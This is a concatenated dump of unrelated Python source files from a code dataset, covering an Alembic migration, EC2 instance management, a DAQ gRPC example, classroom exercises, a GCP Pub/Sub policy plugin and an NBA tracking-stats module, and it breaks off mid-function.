adjust! ###\n op.add_column('myprofile', sa.Column('age', sa.Integer(), nullable=True))\n op.add_column('myprofile', sa.Column('image', sa.String(length=120), nullable=True))\n op.add_column('myprofile', sa.Column('option', sa.String(length=20), nullable=True))\n op.drop_constraint(u'myprofile_nickname_key', 'myprofile', type_='unique')\n op.drop_column('myprofile', 'nickname')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('myprofile', sa.Column('nickname', sa.VARCHAR(length=80), autoincrement=False, nullable=True))\n op.create_unique_constraint(u'myprofile_nickname_key', 'myprofile', ['nickname'])\n op.drop_column('myprofile', 'option')\n op.drop_column('myprofile', 'image')\n op.drop_column('myprofile', 'age')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/c8f0aec2f0f7_.py","file_name":"c8f0aec2f0f7_.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"649829550","text":"import boto3\n\ndata = boto3.client('ec2')\n\nservers = data.describe_instances(Filters=[\n {'Name': 'tag:Name', 'Values': ['kalyan1']}])\n\ninstance_list = []\npublic_instances_running =[]\nt = {}\nfor i in servers['Reservations']:\n for inst_id in i['Instances']:\n t[inst_id['InstanceId']] = {\n 'Public_IP': inst_id.get('PublicIpAddress'),\n 'Private_IP': inst_id['PrivateIpAddress'],\n 'Server_Type': inst_id['InstanceType'],\n 'Key_Name': inst_id['KeyName'],\n 'Instance_State': inst_id['State']['Name']\n }\n instance_list.append(inst_id['InstanceId'])\n\n if inst_id['State']['Name'] == 'running' and inst_id.get('PublicIpAddress') is not None:\n public_instances_running.append(inst_id['InstanceId'])\n\n# Stop the Instances\nprint(\"Stopping the following Public Instances\")\nprint(public_instances_running)\ndata.stop_instances(InstanceIds=public_instances_running)\n\n\n# print(instance_list)\n# # print(t)\n# print(public_instances_running)\n","sub_path":"Boto3/stop_public_ec2_instances_with_tags.py","file_name":"stop_public_ec2_instances_with_tags.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60376101","text":"class Order:\n\n def __init__(self, oid, restaurant, price):\n self.oid = oid\n self.restaurant = restaurant\n self.price = price\n\n def orderToCSV(self):\n return \"{},{},{}\\n\".format(self.oid,self.restaurant,self.price)\n\n\n# Objects Created below are temporary as they are in RAM\no1 = Order(1, \"Basant\", 1000)\no2 = Order(2, \"Bistro\", 1200)\no3 = Order(3, \"Rishi\", 700)\n\nprint(o1.orderToCSV())\nprint(o2.orderToCSV())\nprint(o3.orderToCSV())\n\nfile = open(\"orders.csv\",\"a\")\nfile.write(o1.orderToCSV())\nfile.write(o2.orderToCSV())\nfile.write(o3.orderToCSV())\n\nfile.close()\n\nprint(\">> Orders Saved in File\")\n\n# Read orders.csv file and sort the data on the basis of price from lowest to highest","sub_path":"venv/Session16E.py","file_name":"Session16E.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"483276251","text":"# Demonstrates how to acquire a finite amount of data using the DAQ device's internal clock.\n#\n# The gRPC API is built from the C API. NI-DAQmx documentation is installed with the driver at:\n# C:\\Program Files (x86)\\National Instruments\\NI-DAQ\\docs\\cdaqmx.chm\n#\n# Getting Started:\n#\n# To run this example, install \"NI-DAQmx Driver\" on the server machine.\n# Link: https://www.ni.com/en-us/support/downloads/drivers/download.ni-daqmx.html\n#\n# For instructions on how to use protoc to generate gRPC client interfaces, see our \"Creating a gRPC Client\" wiki page.\n# Link: https://github.com/ni/grpc-device/wiki/Creating-a-gRPC-Client\n#\n# This example uses the \"betterproto\" protocol buffers / gRPC library\n# betterproto produces a more idiomatic version of the gRPC API\n# for more information see: https://github.com/danielgtaylor/python-betterproto\n#\n# NOTE: The betterproto code generator has a bug generating helpers for gRPC messages with oneof fields.\n# If any parameter accepts either an enum value or a raw value, only the raw value is used. For example,\n# when calling cfg_samp_clk_timing, we set active_edge_raw instead of active_edge to avoid a default raw value\n# being used.\n#\n# Running from command line:\n#\n# Server machine's IP address, port number, and physical channel name can be passed as separate command line arguments.\n# > python analog-input-betterproto.py \n# If they are not passed in as command line arguments, then by default the server address will be \"localhost:31763\", with \"Dev1/ai0\" as the physical channel name\n\nimport asyncio\nfrom nidevice import nidaqmx_grpc\nimport sys\nfrom grpclib.client import Channel\n\n\nserver_address = \"localhost\"\nserver_port = \"31763\"\nphysical_channel = \"Dev1/ai0\"\n\nif len(sys.argv) >= 2:\n server_address = sys.argv[1]\nif len(sys.argv) >= 3:\n server_port = sys.argv[2]\nif len(sys.argv) >= 4:\n physical_channel = sys.argv[3]\n\n\nasync def main():\n # Create a gRPC channel + client.\n channel = Channel(host=server_address, port=server_port)\n daq_service = nidaqmx_grpc.NiDAQmxStub(channel)\n task = None\n\n # Raise an exception if an error was returned\n async def raise_if_error(response):\n if response.status != 0:\n response = await daq_service.get_error_string(\n error_code=response.status, buffer_size=2048\n )\n error_string = response.error_string.strip(\" \\0\")\n raise Exception(f\"Error: {error_string}\")\n\n try:\n response = await daq_service.create_task()\n await raise_if_error(response)\n task = response.task\n\n await raise_if_error(\n await daq_service.create_a_i_voltage_chan(\n task=task,\n physical_channel=physical_channel,\n terminal_config_raw=nidaqmx_grpc.InputTermCfgWithDefault.INPUT_TERM_CFG_WITH_DEFAULT_CFG_DEFAULT,\n min_val=-10.0,\n max_val=10.0,\n units_raw=nidaqmx_grpc.VoltageUnits2.VOLTAGE_UNITS2_VOLTS,\n )\n )\n\n await raise_if_error(\n await daq_service.cfg_samp_clk_timing(\n task=task,\n rate=10000.0,\n active_edge_raw=nidaqmx_grpc.Edge1.EDGE1_RISING,\n sample_mode_raw=nidaqmx_grpc.AcquisitionType.ACQUISITION_TYPE_FINITE_SAMPS,\n samps_per_chan=1000,\n )\n )\n\n await raise_if_error(await daq_service.start_task(task=task))\n\n response = await daq_service.read_analog_f64(\n task=task,\n num_samps_per_chan=100,\n array_size_in_samps=100,\n fill_mode_raw=nidaqmx_grpc.GroupBy.GROUP_BY_GROUP_BY_CHANNEL,\n timeout=10.0,\n )\n await raise_if_error(response)\n\n print(f\"Acquired {response.samps_per_chan_read} samples.\")\n print(f\"First 5 samples: {response.read_array[:5]}\")\n finally:\n if task:\n await daq_service.stop_task(task=task)\n await daq_service.clear_task(task=task)\n channel.close()\n\n\n## Run main\nloop = asyncio.get_event_loop()\nfuture = asyncio.ensure_future(main())\nloop.run_until_complete(future)\n","sub_path":"examples/nidaqmx/analog-input-betterproto.py","file_name":"analog-input-betterproto.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75225477","text":"import os\r\nimport numpy as np\r\nfrom scipy.io import loadmat\r\nfrom sklearn import datasets\r\nfrom sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\n\r\ndata_MMI = os.getcwd() + \"/data\" + \"/MMI/\"\r\ndata_MR = os.getcwd() + \"/data\" + \"/MindReading/\"\r\nprint(\"path is\")\r\nprint(data_MR)\r\nlist_of_datasets = [data_MMI, data_MR]\r\nrandom_accuracy_values = []\r\nuncertain_accuracy_values = []\r\nlist_of_numbers = [\"1\", \"2\", \"3\"]\r\ni = 0\r\nfor x in list_of_datasets:\r\n data = x\r\n random_accuracy_values = []\r\n uncertain_accuracy_values.clear()\r\n for y in list_of_numbers:\r\n if i == 0:\r\n trainingLabel_1 = loadmat(x + \"trainingLabels_\" + y, appendmat=True)\r\n traningMat_1 = loadmat(x + \"trainingMatrix_\" + y, appendmat=True)\r\n\r\n\r\n else:\r\n trainingLabel_1 = loadmat(x + \"trainingLabels_MindReading_\" + y, appendmat=True)\r\n traningMat_1 = loadmat(x + \"trainingMatrix_MindReading\" + y, appendmat=True)\r\n trainLabel = np.array(trainingLabel_1['trainingLabels'])\r\n trainLabel_U = trainLabel = trainLabel.T[0]\r\n trainMat_U = trainMat = np.array(traningMat_1['trainingMatrix'])\r\n\r\n print(\"Train Mat shape:\", trainMat.shape)\r\n print(\"Train Label shape:\", trainLabel.shape)\r\n if i == 0:\r\n\r\n testingLabel_1 = loadmat(x + \"testingLabels_\" + y, appendmat=True)\r\n testingMat_1 = loadmat(x + \"testingMatrix_\" + y, appendmat=True)\r\n\r\n else:\r\n testingLabel_1 = loadmat(x + \"testingLabels_MindReading\" + y, appendmat=True)\r\n testingMat_1 = loadmat(x + \"testingMatrix_MindReading\" + y, appendmat=True)\r\n\r\n testLabel = np.array(testingLabel_1['testingLabels'])\r\n testLabel_U = testLabel = testLabel.T[0]\r\n testMat_U = testMat = np.array(testingMat_1['testingMatrix'])\r\n # print(testMat)\r\n print(\"Test Mat shape:\", testMat.shape)\r\n print(\"Test Label shape:\", testLabel.shape)\r\n\r\n # unlabeled\r\n if i == 0:\r\n unlabeled_L = loadmat(x + \"unlabeledLabels_\" + y, appendmat=True)\r\n unlabeled_M = loadmat(x+ \"unlabeledMatrix_\" + y, appendmat=True)\r\n\r\n\r\n else:\r\n\r\n\r\n unlabeled_L = loadmat(x + \"unlabeledLabels_MindReading_\" + y, appendmat=True)\r\n unlabeled_M = loadmat(x + \"unlabeledMatrix_MindReading\" + y, appendmat=True)\r\n\r\n unlabeled_label = np.array(unlabeled_L['unlabeledLabels'])\r\n unlabeled_label_U = unlabeled_label = unlabeled_label.T[0]\r\n unlabeled_mat_U = unlabeled_mat = np.array(unlabeled_M['unlabeledMatrix'])\r\n\r\n print(\"unlabeled label shape: \", unlabeled_label.shape)\r\n print(\"unlabeled Mat shape: \", unlabeled_mat.shape)\r\n\r\n i = i + 1\r\n\r\n N = 50\r\n k = 10\r\n temp_accuracy = []\r\n temp_accuracy.clear()\r\n for i in range(N):\r\n # Create linear regression object\r\n lrmodel = linear_model.LogisticRegression()\r\n lrmodel.fit(trainMat, trainLabel)\r\n temp_accuracy.append(lrmodel.score(testMat, testLabel))\r\n matrixindexes = np.random.choice(np.arange(unlabeled_mat.shape[0]), 10, replace=False)\r\n for j in matrixindexes:\r\n # randNumber = np.random.randint(unlabeled_mat.shape[0])\r\n trainMat = np.vstack([trainMat, unlabeled_mat[j]])\r\n # print(\"unLabeled shape::\", unlabeled_mat.shape)\r\n trainLabel = np.append(trainLabel, unlabeled_label[j])\r\n # remove from unlabeled data\r\n unlabeled_mat = np.delete(unlabeled_mat, matrixindexes, axis=0)\r\n # index = unlabeled_label[randNumber]\r\n unlabeled_label = np.delete(unlabeled_label, matrixindexes)\r\n\r\n random_accuracy_values.append(temp_accuracy)\r\n random_accuracy_values = np.sum(random_accuracy_values, axis=0)\r\n random_accuracy_values = np.true_divide(random_accuracy_values, 3)\r\n\r\n print(\"Random Accuracy: \", random_accuracy_values)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"assignment_3_final.py","file_name":"assignment_3_final.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643460448","text":"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom hmmlearn import hmm\r\nimport pandas as pd\r\n\r\n\r\ndf = pd.read_excel('data2.xlsx') # 读取xlsx\r\ndata = df.iloc[0:, 1:11].values\r\nstates = [\"五代十国\", \"宋\", \"明 洪武\", \"明 永乐\", \"明 宣德\", \"明 成化\", \"明 弘治\", \"明 正德\", \"明 嘉靖\", \"明 隆庆\", \"明 万历\", \"明 崇祯\", \"清\", \"清 康熙\",\r\n \"清 雍正\", \"清 乾隆\"]\r\nn_states = len(states)\r\nplt.rcParams['font.sans-serif'] = ['SimHei']\r\nplt.rcParams['axes.unicode_minus'] = False\r\n\r\ndef double_exponential_smoothing(series, alpha, beta):\r\n result = [series[0]]\r\n\r\n for n in range(1, len(series)+1):\r\n\r\n if n == 1:\r\n\r\n level, trend = series[0], series[1] - series[0]\r\n\r\n if n >= len(series): # forecasting\r\n\r\n value = result[-1]\r\n\r\n else:\r\n\r\n value = series[n]\r\n\r\n last_level, level = level, alpha * value + (1 - alpha) * (level + trend)\r\n\r\n trend = beta * (level - last_level) + (1 - beta) * trend\r\n\r\n result.append(level + trend)\r\n\r\n return result\r\n\r\n\r\n\r\ndef plot_double_exponential_smoothing(series, alphas, betas):\r\n\r\n plt.figure(figsize=(17, 8))\r\n\r\n for alpha in alphas:\r\n\r\n for beta in betas:\r\n\r\n plt.plot(double_exponential_smoothing(series, alpha, beta), label=\"Alpha {}, beta {}\".format(alpha, beta))\r\n\r\n #plt.plot(series)\r\n\r\n plt.legend(loc=\"best\")\r\n\r\n plt.axis('tight')\r\n\r\n plt.title(\"Double Exponential Smoothing\")\r\n\r\n plt.grid(True)\r\n plt.show()\r\n\r\nplot_double_exponential_smoothing(data, alphas=[0.9, 0.02], betas=[0.9, 0.02])","sub_path":"mm.py","file_name":"mm.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512908059","text":"# #######\n# Copyright (c) 2018-2020 Cloudify Platform Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Standard library imports\nfrom __future__ import unicode_literals\n\n# Third-party imports\nfrom cloudify import ctx\nfrom cloudify.decorators import operation\n\n# Local imports\nfrom .. import utils\nfrom ..gcp import check_response\nfrom ..pubsub import PubSubBase\n\n\nclass SubscriptionPolicy(PubSubBase):\n def __init__(self,\n config,\n logger,\n subscription,\n policy,\n name='PubSubPolicy',):\n \"\"\"\n Create Pub/Sub Policy\n\n :param config: gcp auth file\n :param logger: logger object\n :param name: name for the topic policy resource\n :param policy: policy object that contains the following :\n - bindings: Associates a list of members to a role\n - role: Role that is assigned to members.\n - members: Specifies the identities requesting access for\n a Cloud Platform resource\n More info can be found on google api docs\n https://cloud.google.com/pubsub/docs/reference/rest/v1/Policy\n\n :param topic: name of the topic need to set policy for\n\n \"\"\"\n super(SubscriptionPolicy, self).__init__(\n config,\n logger,\n utils.get_gcp_resource_name(name),)\n\n self.name = name\n self.policy = policy\n self.subscription = subscription\n\n @check_response\n def create(self):\n \"\"\"\n Create GCP Pub/Sub Policy.\n :return: REST response contains a newly created instance of policy\n \"\"\"\n self.logger.info(\"Create Topic Policy '{0}'\".format(self.name))\n return self.discovery_pubsub.subscriptions().setIamPolicy(\n resource=self.subscription_path, body=self.to_dict()).execute()\n\n @check_response\n def delete(self):\n pass\n\n def to_dict(self):\n return {'policy': self.policy}\n\n @property\n def subscription_path(self):\n return 'projects/{0}/subscriptions/{1}'.format(self.project,\n self.subscription)\n\n\n@operation(resumable=True)\n@utils.retry_on_failure('Retrying setting iam subscription policy')\n@utils.throw_cloudify_exceptions\ndef set_policy(subscription, policy, **kwargs):\n\n gcp_config = utils.get_gcp_config()\n topic_policy = SubscriptionPolicy(gcp_config, ctx.logger,\n subscription, policy,)\n\n utils.set_resource_id_if_use_external(topic_policy.subscription_path)\n resource = utils.create(topic_policy)\n ctx.instance.runtime_properties.update(resource)\n ctx.logger.info('Policy {0} updated successfully '.format(resource))\n","sub_path":"cloudify_gcp/pubsub/subscription_policy.py","file_name":"subscription_policy.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"572905090","text":"\"\"\"Module containing functions for accessing tracking shot stats\"\"\"\n\nimport time\nimport itertools\n\nfrom dateutil.rrule import rrule, DAILY\nfrom datetime import datetime\n\nfrom nba_stats_tracking import utils\n\n\ndef get_tracking_shots_response(entity_type, season, season_type, **kwargs):\n \"\"\"\n Makes API call to `NBA Advanced Stats `_ and returns JSON response\n\n :param str entity_type: Options are player, team or opponent\n :param str season: Format YYYY-YY ex 2019-20\n :param str season_type: Options are Regular Season or Playoffs or Play In\n :param str date_from: (optional) Format - MM/DD/YYYY\n :param str date_to: (optional) Format - MM/DD/YYYY\n :param str close_def_dist: (optional) Defaults to \"\". Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param str shot_clock: (optional) - Defaults to \"\". Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param str shot_dist: (optional) - Defaults to \"\". Options: '', '>=10.0'\n :param str touch_time: (optional) - Defaults to \"\". Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param str dribbles: (optional) - Defaults to \"\". Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param str general_range: (optional) - Defaults to \"Overall\". Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param int period: (optional) Only get stats for specific period\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: response json\n :rtype: dict\n \"\"\"\n if entity_type == \"team\":\n url = \"https://stats.nba.com/stats/leaguedashteamptshot\"\n elif entity_type == \"player\":\n url = \"https://stats.nba.com/stats/leaguedashplayerptshot\"\n elif entity_type == \"opponent\":\n url = \"https://stats.nba.com/stats/leaguedashoppptshot\"\n else:\n return None\n\n parameters = {\n \"Season\": season,\n \"SeasonType\": season_type,\n \"DateFrom\": kwargs.get(\"date_from\", \"\"),\n \"DateTo\": kwargs.get(\"date_to\", \"\"),\n \"CloseDefDistRange\": kwargs.get(\"close_def_dist\", \"\"),\n \"ShotClockRange\": kwargs.get(\"shot_clock\", \"\"),\n \"ShotDistRange\": kwargs.get(\"shot_dist\", \"\"),\n \"TouchTimeRange\": kwargs.get(\"touch_time\", \"\"),\n \"DribbleRange\": kwargs.get(\"dribbles\", \"\"),\n \"GeneralRange\": kwargs.get(\"general_range\", \"Overall\"),\n \"PerMode\": \"Totals\",\n \"LeagueID\": \"00\",\n \"Period\": kwargs.get(\"period\", \"\"),\n \"Location\": kwargs.get(\"location\", \"\"),\n }\n return utils.get_json_response(url, parameters)\n\n\ndef get_tracking_shot_stats(entity_type, seasons, season_types, **kwargs):\n \"\"\"\n Gets tracking shot stats for filters\n\n :param str entity_type: Options are player, team or opponent\n :param list[str] seasons: List of seasons.Format YYYY-YY ex 2019-20\n :param list[str] season_types: List of season types. Options are Regular Season or Playoffs or Play In\n :param list[str] close_def_dists: (optional) Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param list[str] shot_clocks: (optional) - Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param list[str] shot_dists: (optional) - Options: '', '>=10.0'\n :param list[str] touch_times: (optional) - Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param list[str] dribble_ranges: (optional) - Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param list[str] general_ranges: (optional) - Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param str date_from: (optional) Format - MM/DD/YYYY\n :param str date_to: (optional) Format - MM/DD/YYYY\n :param list[int] periods: (optional) Only get stats for specific periods\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: list of dicts with stats for each player/team\n :rtype: list[dict]\n \"\"\"\n close_def_dists = kwargs.get(\"close_def_dists\", [\"\"])\n shot_clocks = kwargs.get(\"shot_clocks\", [\"\"])\n shot_dists = kwargs.get(\"shot_dists\", [\"\"])\n touch_times = kwargs.get(\"touch_times\", [\"\"])\n dribble_ranges = kwargs.get(\"dribble_ranges\", [\"\"])\n general_ranges = kwargs.get(\"general_ranges\", [\"Overall\"])\n periods = kwargs.get(\"periods\", [\"\"])\n filters = list(\n itertools.product(\n close_def_dists,\n shot_clocks,\n shot_dists,\n touch_times,\n dribble_ranges,\n general_ranges,\n periods,\n )\n )\n\n all_season_stats = []\n for season in seasons:\n for season_type in season_types:\n season_stats = []\n for close_def, clock, dist, touch, dribbles, general, period in filters:\n time.sleep(2)\n response_json = get_tracking_shots_response(\n entity_type,\n season,\n season_type,\n close_def_dist=close_def,\n shot_clock=clock,\n shot_dist=dist,\n touch_time=touch,\n dribbles=dribbles,\n general_range=general,\n date_from=kwargs.get(\"date_from\", \"\"),\n date_to=kwargs.get(\"date_to\", \"\"),\n period=period,\n location=kwargs.get(\"location\", \"\"),\n )\n filter_stats = utils.make_array_of_dicts_from_response_json(\n response_json, 0\n )\n season_stats.append(filter_stats)\n stats = sum_tracking_shot_totals(entity_type, *season_stats)\n entity_id_key = \"PLAYER_ID\" if entity_type == \"player\" else \"TEAM_ID\"\n overall_response_json = get_tracking_shots_response(\n entity_type,\n season,\n season_type,\n general_range=\"Overall\",\n date_from=kwargs.get(\"date_from\", \"\"),\n date_to=kwargs.get(\"date_to\", \"\"),\n )\n overall_stats = utils.make_array_of_dicts_from_response_json(\n overall_response_json, 0\n )\n overall_stats_by_entity = {\n stat[entity_id_key]: {\n \"FGA\": stat[\"FGA\"],\n \"FG2A\": stat[\"FG2A\"],\n \"FG3A\": stat[\"FG3A\"],\n }\n for stat in overall_stats\n }\n for stat in stats:\n entity_id = stat[entity_id_key]\n stat[\"SEASON\"] = f\"{season} {season_type}\"\n stat[\"OVERALL_FGA\"] = overall_stats_by_entity[entity_id][\"FGA\"]\n stat[\"OVERALL_FG2A\"] = overall_stats_by_entity[entity_id][\"FG2A\"]\n stat[\"OVERALL_FG3A\"] = overall_stats_by_entity[entity_id][\"FG3A\"]\n stat[\"FGA_FREQUENCY\"] = (\n stat[\"FGA\"] / stat[\"OVERALL_FGA\"] if stat[\"OVERALL_FGA\"] != 0 else 0\n )\n stat[\"FG2A_FREQUENCY\"] = (\n stat[\"FG2A\"] / stat[\"OVERALL_FGA\"]\n if stat[\"OVERALL_FGA\"] != 0\n else 0\n )\n stat[\"FG3A_FREQUENCY\"] = (\n stat[\"FG3A\"] / stat[\"OVERALL_FGA\"]\n if stat[\"OVERALL_FGA\"] != 0\n else 0\n )\n stat[\"FREQUENCY_OF_FG2A\"] = (\n stat[\"FG2A\"] / stat[\"OVERALL_FG2A\"]\n if stat[\"OVERALL_FG2A\"] != 0\n else 0\n )\n stat[\"FREQUENCY_OF_FG3A\"] = (\n stat[\"FG3A\"] / stat[\"OVERALL_FG3A\"]\n if stat[\"OVERALL_FG3A\"] != 0\n else 0\n )\n all_season_stats += stats\n return all_season_stats\n\n\ndef aggregate_full_season_tracking_shot_stats_for_seasons(\n entity_type, seasons, season_types, **kwargs\n):\n \"\"\"\n Aggregates full season stats for desired filters.\n Returns list of dicts for stats for each team/player and dict with league totals.\n\n :param str entity_type: Options are player, team or opponent\n :param list[str] seasons: List of seasons.Format YYYY-YY ex 2019-20\n :param list[str] season_types: List of season types. Options are Regular Season or Playoffs or Play In\n :param list[str] close_def_dists: (optional) Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param list[str] shot_clocks: (optional) - Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param list[str] shot_dists: (optional) - Options: '', '>=10.0'\n :param list[str] touch_times: (optional) - Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param list[str] dribble_ranges: (optional) - Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param list[str] general_ranges: (optional) - Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param list[int] periods: (optional) Only get stats for specific periods\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: tuple with list of dicts for stats for each player/team and dict with league totals\n :rtype: tuple(list[dict], dict)\n \"\"\"\n stats_by_season = get_tracking_shot_stats(\n entity_type, seasons, season_types, **kwargs\n )\n\n stats = sum_tracking_shot_totals(entity_type, stats_by_season)\n league_totals = sum_tracking_shot_totals(\"league\", stats_by_season)\n return stats, league_totals\n\n\ndef generate_tracking_shot_game_logs(entity_type, date_from, date_to, **kwargs):\n \"\"\"\n Generates game logs for all games between two dates for desired filters\n\n :param str entity_type: Options are player, team or opponent\n :param str date_from: Format - MM/DD/YYYY\n :param str date_to: Format - MM/DD/YYYY\n :param dict team_id_game_id_map: (optional) dict mapping team id to game id. When\n getting game logs for multiple separate filters for the same date it is recommended\n that you pass this in to avoid making the same request multiple times\n :param dict team_id_opponent_team_id_map: (optional) dict mapping team id to opponent team id.\n When getting game logs for multiple separate filters for the same date it is recommended\n that you pass this in to avoid making the same request multiple times\n :param dict player_id_team_id_map: (optional) dict mapping player id to team id. When\n getting game logs for multiple separate filters for the same date it is recommended\n that you pass this in to avoid making the same request multiple times\n :param list[str] close_def_dists: (optional) Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param list[str] shot_clocks: (optional) - Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param list[str] shot_dists: (optional) - Options: '', '>=10.0'\n :param list[str] touch_times: (optional) - Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param list[str] dribble_ranges: (optional) - Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param list[str] general_ranges: (optional) - Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param list[int] periods: (optional) Only get stats for specific periods\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: list of game log dicts\n :rtype: list[dict]\n \"\"\"\n start_date = datetime.strptime(date_from, \"%m/%d/%Y\")\n end_date = datetime.strptime(date_to, \"%m/%d/%Y\")\n team_id_game_id_map = kwargs.get(\"team_id_game_id_map\")\n team_id_opponent_team_id_map = kwargs.get(\"team_id_opponent_team_id_map\")\n player_id_team_id_map = kwargs.get(\"player_id_team_id_map\")\n get_player_id_team_id_map = player_id_team_id_map is None\n get_team_id_maps = (\n team_id_game_id_map is None or team_id_opponent_team_id_map is None\n )\n game_logs = []\n for dt in rrule(DAILY, dtstart=start_date, until=end_date):\n date = dt.strftime(\"%m/%d/%Y\")\n if get_team_id_maps:\n (\n team_id_game_id_map,\n team_id_opponent_team_id_map,\n ) = utils.get_team_id_maps_for_date(date)\n if len(team_id_game_id_map.values()) != 0:\n if get_player_id_team_id_map:\n player_id_team_id_map = utils.get_player_team_map_for_date(date)\n date_game_id = list(team_id_game_id_map.values())[0]\n\n season = utils.get_season_from_game_id(date_game_id)\n season_type = utils.get_season_type_from_game_id(date_game_id)\n\n tracking_shots_data = get_tracking_shot_stats(\n entity_type,\n [season],\n [season_type],\n date_from=date,\n date_to=date,\n **kwargs,\n )\n tracking_shots_game_logs = sum_tracking_shot_totals(\n entity_type, tracking_shots_data\n )\n if entity_type == \"player\":\n # need to add team id for player because results only have PLAYER_LAST_TEAM_ID,\n # which may not be the team for which they played the game\n for game_log in tracking_shots_game_logs:\n game_log[\"TEAM_ID\"] = player_id_team_id_map[game_log[\"PLAYER_ID\"]]\n for game_log in tracking_shots_game_logs:\n game_log[\"GAME_ID\"] = team_id_game_id_map[game_log[\"TEAM_ID\"]]\n game_log[\"OPPONENT_TEAM_ID\"] = team_id_opponent_team_id_map[\n game_log[\"TEAM_ID\"]\n ]\n game_logs += tracking_shots_game_logs\n return game_logs\n\n\ndef sum_tracking_shot_totals(entity_type, *args):\n r\"\"\"\n Sums totals for given dicts and grouped by entity type\n\n :param str entity_type: Options are player, team, opponent or league\n :param dict \\*args: Variable length argument list of dicts to be summed up\n :return: list of dicts with totals for each entity\n :rtype: list[dict]\n \"\"\"\n if entity_type == \"player\":\n entity_key = \"PLAYER_ID\"\n elif entity_type == \"team\" or entity_type == \"opponent\":\n entity_key = \"TEAM_ID\"\n elif entity_type == \"league\":\n totals_dict = {\n \"FGM\": 0,\n \"FGA\": 0,\n \"FG2M\": 0,\n \"FG2A\": 0,\n \"FG3M\": 0,\n \"FG3A\": 0,\n \"OVERALL_FGA\": 0,\n \"OVERALL_FG2A\": 0,\n \"OVERALL_FG3A\": 0,\n }\n for items in args:\n for item in items:\n totals_dict = add_to_tracking_shot_totals(totals_dict, item)\n return totals_dict\n else:\n return None\n totals_dict = {}\n for items in args:\n for item in items:\n entity_id = item[entity_key]\n if entity_id not in totals_dict.keys():\n if entity_type == \"player\":\n totals_dict[entity_id] = {\n \"PLAYER_ID\": item[\"PLAYER_ID\"],\n \"PLAYER_NAME\": item[\"PLAYER_NAME\"],\n \"PLAYER_LAST_TEAM_ID\": item[\"PLAYER_LAST_TEAM_ID\"],\n \"PLAYER_LAST_TEAM_ABBREVIATION\": item[\n \"PLAYER_LAST_TEAM_ABBREVIATION\"\n ],\n \"FGM\": 0,\n \"FGA\": 0,\n \"FG2M\": 0,\n \"FG2A\": 0,\n \"FG3M\": 0,\n \"FG3A\": 0,\n \"OVERALL_FGA\": 0,\n \"OVERALL_FG2A\": 0,\n \"OVERALL_FG3A\": 0,\n }\n elif entity_type == \"team\" or entity_type == \"opponent\":\n totals_dict[entity_id] = {\n 